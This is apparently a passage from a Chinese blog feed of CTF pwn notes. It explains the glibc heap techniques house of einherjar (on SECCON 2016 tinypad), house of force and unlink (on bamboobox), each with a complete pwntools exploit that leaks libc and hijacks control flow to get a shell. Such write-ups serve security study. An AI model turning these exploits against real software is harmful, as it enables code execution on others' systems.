<content><![CDATA[<h1 id="house-of-einherjar"><a href="#house-of-einherjar" class="headerlink" title="house of einherjar"></a>house of einherjar</h1><h1 id="利用原理"><a href="#利用原理" class="headerlink" title="利用原理"></a>利用原理</h1><p><code>free</code> 函数后向(向低地址)合并操作</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="comment">/* consolidate backward */</span></span><br><span class="line"><span class="keyword">if</span> (!prev_inuse(p)) {</span><br><span class="line"> prevsize = prev_size(p);</span><br><span class="line"> size += prevsize;</span><br><span class="line"> p = chunk_at_offset(p, -((<span class="keyword">long</span>) prevsize));</span><br><span class="line"> unlink(av, p, bck, fwd);</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>顺便看看 <code>unlink</code> 源码</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">define</span> unlink(AV, P, BK, FD) { \</span></span><br><span class="line"> FD = P->fd; \</span><br><span class="line"> BK = P->bk; \</span><br><span class="line"> <span class="keyword">if</span> (__builtin_expect (FD->bk != P || BK->fd != P, <span class="number">0</span>)) \</span><br><span class="line"> malloc_printerr (check_action, <span class="string">"corrupted double-linked list"</span>, P, AV); \</span><br><span class="line"> <span class="keyword">else</span> { \</span><br><span class="line"> FD->bk = BK; \</span><br><span class="line"> BK->fd = FD; \</span><br><span class="line"> <span class="keyword">if</span> (!in_smallbin_range (P->size) \</span><br><span class="line"> && __builtin_expect (P->fd_nextsize != <span class="literal">NULL</span>, <span class="number">0</span>)) { \</span><br><span class="line"> <span class="keyword">if</span> (__builtin_expect (P->fd_nextsize->bk_nextsize != P, <span class="number">0</span>) \</span><br><span class="line"> || __builtin_expect (P->bk_nextsize->fd_nextsize != P, <span class="number">0</span>)) \</span><br><span class="line"> malloc_printerr (check_action, \</span><br><span class="line"> <span class="string">"corrupted double-linked list (not small)"</span>, \</span><br><span class="line"> P, AV); \</span><br><span class="line"> <span class="keyword">if</span> (FD->fd_nextsize == <span class="literal">NULL</span>) { \</span><br><span class="line"> <span class="keyword">if</span> (P->fd_nextsize == P) \</span><br><span class="line"> FD->fd_nextsize = FD->bk_nextsize = FD; \</span><br><span class="line"> <span class="keyword">else</span> { \</span><br><span class="line"> FD->fd_nextsize = P->fd_nextsize; \</span><br><span class="line"> FD->bk_nextsize = P->bk_nextsize; \</span><br><span class="line"> P->fd_nextsize->bk_nextsize = FD; \</span><br><span class="line"> P->bk_nextsize->fd_nextsize = FD; \</span><br><span class="line"> } \</span><br><span class="line"> } <span class="keyword">else</span> { \</span><br><span class="line"> P->fd_nextsize->bk_nextsize = P->bk_nextsize; \</span><br><span class="line"> P->bk_nextsize->fd_nextsize = P->fd_nextsize; \</span><br><span class="line"> } \</span><br><span class="line"> } \</span><br><span class="line"> } \</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<h2 id="利用条件"><a href="#利用条件" class="headerlink" title="利用条件"></a>利用条件</h2><ul>
<li>利用堆溢出或者off-by-null漏洞能修改高地址的 chunk 的 <code>prev_inuse</code> 字段。(栈溢出/off-by-one)</li>
<li>后向(向低地址)合并时,新的 chunk 的位置取决于 <code>chunk_at_offset(p, -((long) prevsize))</code> 。</li>
<li><code>fake_chunk</code> 的 <code>fd</code> 和 <code>bk</code> 为 <code>fake_chunk</code> 的地址,以绕过 unlink检测。</li>
<li>我们需要计算目的 chunk 与 p1 地址之间的差,所以需要泄漏地址。</li>
<li>我们需要在目的 chunk 附近构造相应的 fake chunk,从而绕过 unlink 的检测。</li>
</ul>
<h1 id="2016-Seccon-tinypad"><a href="#2016-Seccon-tinypad" class="headerlink" title="2016 Seccon tinypad"></a>2016 Seccon tinypad</h1><p>程序存在 <code>off-by-null</code> 漏洞。</p>
<h2 id="exp详解"><a href="#exp详解" class="headerlink" title="exp详解"></a>exp详解</h2><p>leak 地址部分就不详细分析了,从 <code>house of einherjar</code> 分配堆块开始分析。</p>
<h3 id="1-堆块分配"><a href="#1-堆块分配" class="headerlink" title="1.堆块分配"></a>1.堆块分配</h3><p>chunk1 用于修改 chunk2 的 prev_size 段以及 prev_inuse 。</p>
<p>chunk3、chunk4 主要用于填充程序自定义的缓冲区域。</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">add(<span class="number">0x18</span>,<span class="string">'a'</span>*<span class="number">0x18</span>) <span class="comment">#1</span></span><br><span class="line">add(<span class="number">0x100</span>,<span class="string">'b'</span>*<span class="number">0xf8</span> + <span class="string">'\x11'</span>) <span class="comment">#2</span></span><br><span class="line">add(<span class="number">0x100</span>,<span class="string">'c'</span>*<span class="number">0xf8</span>) <span class="comment">#3</span></span><br><span class="line">add(<span class="number">0x100</span>,<span class="string">'d'</span>*<span class="number">0xf8</span>) <span class="comment">#4</span></span><br></pre></td></tr></table></figure>
<p>利用分为两个部分,第一是在 target_addr 处(选择在 tinypad+0x20 处)构造 fake_chunk 。第二是写 chunk2 的 prev_size 段以及 prev_inuse 。</p>
<h3 id="2-构造-fake-chunk"><a href="#2-构造-fake-chunk" class="headerlink" title="2.构造 fake_chunk"></a>2.构造 fake_chunk</h3><figure class="highlight python"><table><tr><td class="code"><pre><span class="line">payload = <span class="string">'a'</span>*<span class="number">0x20</span></span><br><span class="line">payload += p64(<span class="number">0</span>) + p64(<span class="number">0x101</span>)</span><br><span class="line">payload += p64(fd) + p64(bk)</span><br><span class="line">edit(<span class="number">3</span>,payload)</span><br></pre></td></tr></table></figure>
<h3 id="3-写-chunk2-字段"><a href="#3-写-chunk2-字段" class="headerlink" title="3.写 chunk2 字段"></a>3.写 chunk2 字段</h3><p>在此之前我们需要计算出 chunk2 到 tinypad+0x20 处的距离</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">tinypad = <span class="number">0x602040</span></span><br><span class="line">fake_chunk_addr = tinypad + <span class="number">0x20</span></span><br><span class="line">fd = fake_chunk_addr</span><br><span class="line">bk = fake_chunk_addr</span><br><span class="line">offset = chunk2 - fake_chunk_addr</span><br></pre></td></tr></table></figure>
<p>通过程序strcpy写入构造的 chunk2 字段,再 free(2)。</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">payload = <span class="string">'a'</span>*<span class="number">0x14</span> + p64(offset)</span><br><span class="line">edit(<span class="number">1</span>,payload)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">4</span>):</span><br><span class="line"> payload = <span class="string">'a'</span>*(<span class="number">0x13</span>-i) + p64(offset)</span><br><span class="line"> edit(<span class="number">1</span>,payload)</span><br><span class="line">free(<span class="number">2</span>)</span><br></pre></td></tr></table></figure>
<p><img src="/article/house%20of%20einherjar/image-20211130105542360.png" alt="image-20211130105542360"></p>
<p>下一个申请的 0xf0 大小的堆块就在 0x602060 处。</p>
<p><img src="/article/house%20of%20einherjar/image-20211130105718209.png" alt="image-20211130105718209"></p>
<h3 id="4-修复-fake-chunk"><a href="#4-修复-fake-chunk" class="headerlink" title="4.修复 fake_chunk"></a>4.修复 fake_chunk</h3><p>在申请堆块之前我们需要修复一下 fake_chunk 的 size 、fd 和 bk,</p>
<p>fd 和 bk 必须是 unsorted bin</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">payload = <span class="string">'b'</span>*<span class="number">0x20</span> </span><br><span class="line">payload += p64(<span class="number">0</span>) + p64(<span class="number">0x101</span>)</span><br><span class="line">payload += p64(malloc_hook+<span class="number">0x10</span>+<span class="number">88</span>)*<span class="number">2</span></span><br><span class="line">edit(<span class="number">4</span>,payload)</span><br></pre></td></tr></table></figure>
<p>后写 payload 修改 tinypad_array 的指针</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">payload = <span class="string">'f'</span> * (<span class="number">0x100</span> - <span class="number">0x20</span> - <span class="number">0x10</span>) + p64(<span class="number">0x18</span>) + p64(environ) + p64(<span class="number">0xf0</span>) + p64(<span class="number">0x602148</span>)</span><br><span class="line">add(<span class="number">0xf8</span>,payload)</span><br></pre></td></tr></table></figure>
<h3 id="5-修改-main-函数的返回地址为-one-gadget-地址获取-shell"><a href="#5-修改-main-函数的返回地址为-one-gadget-地址获取-shell" class="headerlink" title="5.修改 main 函数的返回地址为 one_gadget 地址获取 shell"></a>5.修改 main 函数的返回地址为 one_gadget 地址获取 shell</h3><p>首先是在栈上找到 0x7f9afca72840 (__libc_start_main+240),后计算出偏移</p>
<p><img src="/article/house%20of%20einherjar/image-20211130120204305.png" alt="image-20211130120204305"></p>
<p><img src="/article/house%20of%20einherjar/image-20211130120604059.png" alt="image-20211130120604059"></p>
<p><img src="/article/house%20of%20einherjar/image-20211130120609788.png" alt="image-20211130120609788"></p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">offset = environ_addr - (__libc_start_main+<span class="number">240</span>)</span><br><span class="line"></span><br><span class="line">main_ret = environ_addr - offset</span><br></pre></td></tr></table></figure>
<p>chunk2 -> chunk1 ,利用 chunk2 修改 chunk1 指向 main_ret ,chunk1 修改 main_ret 为one_gadget</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">edit(<span class="number">2</span>,p64(main_ret))</span><br></pre></td></tr></table></figure>
<p><img src="/article/house%20of%20einherjar/image-20211130121532715.png" alt="image-20211130121532715"></p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">edit(<span class="number">1</span>,p64(one_gadget))</span><br></pre></td></tr></table></figure>
<p><img src="/article/house%20of%20einherjar/image-20211130121818300.png" alt="image-20211130121818300"></p>
<h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time, sys, base64</span><br><span class="line"></span><br><span class="line">context.os = <span class="string">'linux'</span></span><br><span class="line">context.arch = <span class="string">'amd64'</span></span><br><span class="line"><span class="comment"># context.arch = 'i386'</span></span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1 pro</span></span><br><span class="line"><span class="comment"># 2 remote</span></span><br><span class="line"><span class="comment"># 3 127</span></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line">filename = <span class="string">'tinypad'</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line"> p = process(filename)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span>:</span><br><span class="line"> p = remote(<span class="string">'node4.buuoj.cn'</span>,<span class="number">20002</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line"> p = remote(<span class="string">'127.0.0.1'</span>,<span class="number">12345</span>)</span><br><span class="line"> <span class="comment">#23946</span></span><br><span class="line"></span><br><span class="line">elf = ELF(filename)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">cmd</span>(<span class="params">index</span>):</span></span><br><span class="line"> p.sendlineafter(<span class="string">'(CMD)>>> '</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">size,content</span>):</span></span><br><span class="line"> cmd(<span class="string">'A'</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'(SIZE)>>> '</span>,<span class="built_in">str</span>(size))</span><br><span class="line"> p.sendlineafter(<span class="string">'(CONTENT)>>> '</span>,content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">index,content</span>):</span></span><br><span class="line"> cmd(<span class="string">'E'</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'(INDEX)>>> '</span>,<span class="built_in">str</span>(index)) </span><br><span class="line"> p.sendlineafter(<span class="string">'(CONTENT)>>> '</span>,content) </span><br><span class="line"> p.sendlineafter(<span class="string">'(Y/n)>>> '</span>,<span class="string">'Y'</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">free</span>(<span class="params">index</span>):</span></span><br><span class="line"> cmd(<span class="string">'D'</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'(INDEX)>>> '</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="comment"># BEGIN leak</span></span><br><span class="line">add(<span class="number">0x70</span>,<span class="string">'a'</span>)</span><br><span class="line">add(<span class="number">0x70</span>,<span class="string">'b'</span>)</span><br><span class="line">add(<span class="number">0x100</span>,<span class="string">'c'</span>)</span><br><span class="line"></span><br><span class="line">free(<span class="number">2</span>)</span><br><span class="line">free(<span class="number">1</span>)</span><br><span class="line">p.recvuntil(<span class="string">' # CONTENT: '</span>)</span><br><span class="line">chunk1 = u64(p.recv(<span class="number">4</span>).ljust(<span class="number">8</span>,<span class="string">'\x00'</span>)) - <span class="number">0x80</span></span><br><span class="line">chunk2 = chunk1 + <span class="number">0x20</span></span><br><span class="line">log.success(<span class="string">'chunk1: '</span> + <span class="built_in">hex</span>(chunk1))</span><br><span class="line"></span><br><span class="line">free(<span class="number">3</span>)</span><br><span class="line">malloc_hook = u64(p.recvuntil(<span class="string">'\x7f'</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">'\x00'</span>)) - <span class="number">0x10</span> - <span class="number">88</span> </span><br><span class="line">log.success(<span class="string">'malloc_hook: '</span> + <span class="built_in">hex</span>(malloc_hook))</span><br><span class="line">libc_base = malloc_hook - libc.sym[<span class="string">'__malloc_hook'</span>]</span><br><span class="line">system_addr = libc_base + libc.sym[<span class="string">'system'</span>]</span><br><span class="line">free_hook = libc_base + libc.sym[<span class="string">'__free_hook'</span>]</span><br><span class="line">environ = libc_base + libc.sym[<span class="string">'__environ'</span>]</span><br><span class="line">log.success(<span class="string">'libc_base: '</span> + <span class="built_in">hex</span>(libc_base))</span><br><span class="line">log.success(<span class="string">'system_addr: '</span> + <span class="built_in">hex</span>(system_addr))</span><br><span class="line">log.success(<span class="string">'free_hook: '</span> + <span class="built_in">hex</span>(free_hook))</span><br><span class="line">log.success(<span class="string">'environ: '</span> + <span class="built_in">hex</span>(environ))</span><br><span class="line"><span class="comment"># END leak</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0x18</span>,<span class="string">'a'</span>*<span class="number">0x18</span>)</span><br><span class="line">add(<span class="number">0x100</span>,<span class="string">'b'</span>*<span class="number">0xf8</span> + <span class="string">'\x11'</span>)</span><br><span class="line">add(<span class="number">0x100</span>,<span class="string">'c'</span>*<span class="number">0xf8</span>)</span><br><span class="line">add(<span class="number">0x100</span>,<span class="string">'d'</span>*<span class="number">0xf8</span>)</span><br><span class="line"></span><br><span class="line">tinypad = <span class="number">0x602040</span></span><br><span class="line">fake_chunk_addr = tinypad + <span class="number">0x20</span></span><br><span class="line">fd = fake_chunk_addr</span><br><span class="line">bk = fake_chunk_addr</span><br><span class="line">offset = chunk2 - fake_chunk_addr</span><br><span class="line"></span><br><span class="line">payload = <span class="string">'a'</span>*<span class="number">0x20</span></span><br><span class="line">payload += p64(<span class="number">0</span>) + p64(<span class="number">0x101</span>)</span><br><span class="line">payload += p64(fd) + p64(bk)</span><br><span class="line">edit(<span class="number">3</span>,payload)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">'a'</span>*<span class="number">0x14</span> + p64(offset)</span><br><span class="line">edit(<span class="number">1</span>,payload)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">4</span>):</span><br><span class="line"> payload = <span class="string">'a'</span>*(<span class="number">0x13</span>-i) + p64(offset)</span><br><span class="line"> edit(<span class="number">1</span>,payload)</span><br><span class="line"></span><br><span class="line">free(<span class="number">2</span>)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">'b'</span>*<span class="number">0x20</span> </span><br><span class="line">payload += p64(<span class="number">0</span>) + p64(<span class="number">0x101</span>)</span><br><span class="line">payload += p64(malloc_hook+<span class="number">0x10</span>+<span class="number">88</span>)*<span class="number">2</span></span><br><span class="line">edit(<span class="number">4</span>,payload)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">'f'</span> * (<span class="number">0x100</span> - <span class="number">0x20</span> - <span class="number">0x10</span>) + p64(<span class="number">0x18</span>) + p64(environ) + p64(<span class="number">0xf0</span>) + p64(<span class="number">0x602148</span>)</span><br><span class="line">add(<span class="number">0xf8</span>,payload)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">'# CONTENT: '</span>)</span><br><span class="line">environ_addr = u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">'\x00'</span>))</span><br><span class="line">main_ret = environ_addr - <span class="number">0xf0</span></span><br><span class="line">one_gadget = libc_base + <span class="number">0x45226</span></span><br><span class="line">log.success(<span class="string">'environ_addr: '</span> + <span class="built_in">hex</span>(environ_addr))</span><br><span class="line">log.success(<span class="string">'main_ret: '</span> + <span class="built_in">hex</span>(main_ret))</span><br><span class="line"></span><br><span class="line">edit(<span class="number">2</span>,p64(main_ret))</span><br><span class="line">edit(<span class="number">1</span>,p64(one_gadget))</span><br><span class="line"></span><br><span class="line">gdb.attach(p)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
]]></content>
<categories>
<category>笔记</category>
</categories>
</entry>
<entry>
<title>house of force</title>
<url>/article/house%20of%20force/</url>
<content><![CDATA[<h1 id="house-of-force"><a href="#house-of-force" class="headerlink" title="house of force"></a>house of force</h1><!-- 文章页 配置 -->
<h2 id="hitcontraining-bamboobox"><a href="#hitcontraining-bamboobox" class="headerlink" title="hitcontraining_bamboobox"></a>hitcontraining_bamboobox</h2><h3 id="基本功能"><a href="#基本功能" class="headerlink" title="基本功能"></a>基本功能</h3><ul>
<li>程序在开始时就申请了一个 chunk 用于存放两个函数指针</li>
<li>show </li>
<li>add:读取名字使用的是 <code>read</code> 函数,读取长度的参数是用户输入的 v2,而 read 的第三个参数是无符号整数,如果我们输入负数,就可以读取任意长度。所以这里存在<strong>任意长度堆溢出</strong>的漏洞。</li>
<li>change:重新输入 <code>name</code> 的长度进行写入,存在<strong>任意长度堆溢出</strong></li>
<li>remove:将对应物品的名字的大小置为 0,并将对应的 content 置为 NULL</li>
<li>magic 函数:读取 flag 并打印</li>
</ul>
<h3 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h3><p>覆盖某个指针为 magic 函数的指针,goodbye_message 函数在程序结束时调用,利用覆盖 goodbye_message 来控制程序流:</p>
<ol>
<li><p>申请一个 chunk</p>
<p><img src="/article/house%20of%20force/image-20211019162935944.png" alt="image-20211019162935944"></p>
</li>
<li><p>堆溢出修改 top chunk</p>
<p><img src="/article/house%20of%20force/image-20211019163644606.png" alt="image-20211019163644606"></p>
<p>目的地址是 <code>0xf87000</code> ,</p>
</li>
<li><p>向上申请 chunk,malloc(负数)</p>
<p>负数 = 0xf87000 - 0xf87050 - 0x10 = -96(-0x60)</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">add(-<span class="number">0x60</span>,<span class="string">''</span>)</span><br></pre></td></tr></table></figure>
<p><img src="/article/house%20of%20force/image-20211019164429485.png" alt="image-20211019164429485"></p>
<p>下一个申请的 chunk 地址为 0x15e7000,由于 size 检测,所以申请大小为 0x10</p>
</li>
<li><p>申请 0x10 的chunk,写入 magic_addr</p>
<p><img src="/article/house%20of%20force/image-20211019164702377.png" alt="image-20211019164702377"></p>
</li>
</ol>
<h3 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h3><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time, sys, base64</span><br><span class="line"></span><br><span class="line">context.os = <span class="string">'linux'</span></span><br><span class="line">context.arch = <span class="string">'amd64'</span></span><br><span class="line"><span class="comment"># context.arch = 'i386'</span></span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1 process</span></span><br><span class="line"><span class="comment"># 2 remote</span></span><br><span class="line"><span class="comment"># 3 127</span></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line"> p = process(<span class="string">'./bamboobox'</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span>:</span><br><span class="line"> p = remote(<span class="string">'node4.buuoj.cn'</span>,<span class="number">27833</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line"> p = remote(<span class="string">'127.0.0.1'</span>,<span class="number">12345</span>)</span><br><span class="line"> <span class="comment">#23946</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># elf = ELF('./bamboobox')</span></span><br><span class="line"><span class="comment"># libc = ELF('./libc.so.6')</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params">index</span>):</span></span><br><span class="line"> p.sendlineafter(<span class="string">'Your choice:'</span>,<span class="string">'1'</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'idx: '</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">size,name</span>):</span></span><br><span class="line"> p.sendlineafter(<span class="string">'Your choice:'</span>,<span class="string">'2'</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'name:'</span>,<span class="built_in">str</span>(size))</span><br><span class="line"> p.sendlineafter(<span class="string">'name of item:'</span>,<span class="built_in">str</span>(name))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">index,size,name</span>):</span></span><br><span class="line"> p.sendlineafter(<span class="string">'Your choice:'</span>,<span class="string">'3'</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'index of item:'</span>,<span class="built_in">str</span>(index)) </span><br><span class="line"> p.sendlineafter(<span class="string">'length of item name:'</span>,<span class="built_in">str</span>(size))</span><br><span class="line"> p.sendlineafter(<span class="string">'name of the item:'</span>,name)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">free</span>(<span class="params">index</span>):</span></span><br><span class="line"> p.sendlineafter(<span class="string">'Your choice:'</span>,<span class="string">'4'</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'index of item:'</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line">magic_addr = <span class="number">0x400D49</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0x20</span>,<span class="string">'aaaa'</span>)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">'a'</span>*<span class="number">0x28</span> + <span class="string">'\xff'</span>*<span class="number">8</span></span><br><span class="line">edit(<span class="number">0</span>,<span class="built_in">len</span>(payload),payload)</span><br><span class="line"></span><br><span class="line">add(-<span class="number">0x60</span>,<span class="string">''</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="number">0x10</span>,p64(magic_addr)*<span class="number">2</span>)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">'Your choice:'</span>,<span class="string">'5'</span>)</span><br><span class="line">gdb.attach(p)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h3 id="Unlink"><a href="#Unlink" class="headerlink" title="Unlink"></a>Unlink</h3><p>这个题目的另一个解法</p>
<h4 id="利用-1"><a href="#利用-1" class="headerlink" title="利用"></a>利用</h4><ul>
<li>通过 unlink 把 chunk 移到存储 chunk 指针的内存处</li>
<li>覆盖 chunk 0 指针为 atoi 的 got 表地址并泄露。</li>
<li>覆盖 atoi 的 got 表为 system 函数地址</li>
<li>给出参数 ‘sh’,调用 atoi 函数拿 shell</li>
</ul>
<h4 id="exp-1"><a href="#exp-1" class="headerlink" title="exp"></a>exp</h4><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time, sys, base64</span><br><span class="line"></span><br><span class="line">context.os = <span class="string">'linux'</span></span><br><span class="line">context.arch = <span class="string">'amd64'</span></span><br><span class="line"><span class="comment"># context.arch = 'i386'</span></span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1 process</span></span><br><span class="line"><span class="comment"># 2 remote</span></span><br><span class="line"><span class="comment"># 3 127</span></span><br><span class="line">debug = <span class="number">2</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line"> p = process(<span class="string">'./bamboobox'</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span>:</span><br><span class="line"> p = remote(<span class="string">'node4.buuoj.cn'</span>,<span class="number">27833</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line"> p = remote(<span class="string">'127.0.0.1'</span>,<span class="number">12345</span>)</span><br><span class="line"> <span class="comment">#23946</span></span><br><span class="line"></span><br><span class="line">elf = ELF(<span class="string">'./bamboobox'</span>)</span><br><span class="line">libc = ELF(<span class="string">'./libc/libc-2.23.so'</span>)</span><br><span class="line">atoi_got = elf.got[<span class="string">'atoi'</span>]</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>():</span></span><br><span class="line"> p.sendlineafter(<span class="string">'Your choice:'</span>,<span class="string">'1'</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">size,name</span>):</span></span><br><span class="line"> p.sendlineafter(<span class="string">'Your choice:'</span>,<span class="string">'2'</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'name:'</span>,<span class="built_in">str</span>(size))</span><br><span class="line"> p.sendlineafter(<span class="string">'name of item:'</span>,<span class="built_in">str</span>(name))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">index,content</span>):</span></span><br><span class="line"> p.sendlineafter(<span class="string">'Your choice:'</span>,<span class="string">'3'</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'index of item:'</span>,<span class="built_in">str</span>(index)) </span><br><span class="line"> p.sendlineafter(<span class="string">'length of item name:'</span>,<span class="built_in">str</span>(<span class="built_in">len</span>(content)))</span><br><span class="line"> p.sendlineafter(<span class="string">'name of the item:'</span>,content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">free</span>(<span class="params">index</span>):</span></span><br><span class="line"> p.sendlineafter(<span class="string">'Your choice:'</span>,<span class="string">'4'</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'index of item:'</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line">target = <span class="number">0x6020c8</span></span><br><span class="line">fd = target - <span class="number">0x18</span></span><br><span class="line">bk = target - <span class="number">0x10</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0x30</span>,<span class="string">'aaaa'</span>)</span><br><span class="line">add(<span class="number">0x80</span>,<span class="string">'bbbb'</span>)</span><br><span class="line">add(<span class="number">0x30</span>,<span class="string">'cccc'</span>)</span><br><span class="line"></span><br><span class="line">payload = p64(<span class="number">0</span>) + p64(<span class="number">0x30</span>)</span><br><span class="line">payload += p64(fd) + p64(bk)</span><br><span class="line">payload += <span class="string">'a'</span>*<span class="number">0x10</span></span><br><span class="line">payload += p64(<span class="number">0x30</span>) + p64(<span class="number">0x90</span>)</span><br><span class="line">edit(<span class="number">0</span>,payload)</span><br><span class="line"></span><br><span class="line">free(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">payload = p64(<span class="number">0</span>)*<span class="number">2</span> + p64(<span class="number">0x30</span>) + p64(atoi_got)</span><br><span class="line">edit(<span class="number">0</span>,payload)</span><br><span class="line"></span><br><span class="line">show()</span><br><span class="line">atoi_addr = u64(p.recvuntil(<span class="string">'\x7f'</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">'\x00'</span>))</span><br><span class="line">libc_base = atoi_addr - libc.sym[<span class="string">'atoi'</span>]</span><br><span class="line">system_addr = libc_base + libc.sym[<span class="string">'system'</span>]</span><br><span class="line">log.success(<span class="built_in">hex</span>(system_addr))</span><br><span class="line">log.success(<span class="built_in">hex</span>(atoi_addr))</span><br><span class="line"></span><br><span class="line">edit(<span class="number">0</span>,p64(system_addr))</span><br><span class="line"><span class="comment"># gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
]]></content>
<categories>
<category>笔记</category>
</categories>
</entry>
<entry>
<title>glibc-all-in-one</title>
<url>/article/glibc-all-in-one/</url>
<content><![CDATA[<h1 id="记glibc-all-in-one使用"><a href="#记glibc-all-in-one使用" class="headerlink" title="记glibc-all-in-one使用"></a>记glibc-all-in-one使用</h1><span id="more"></span>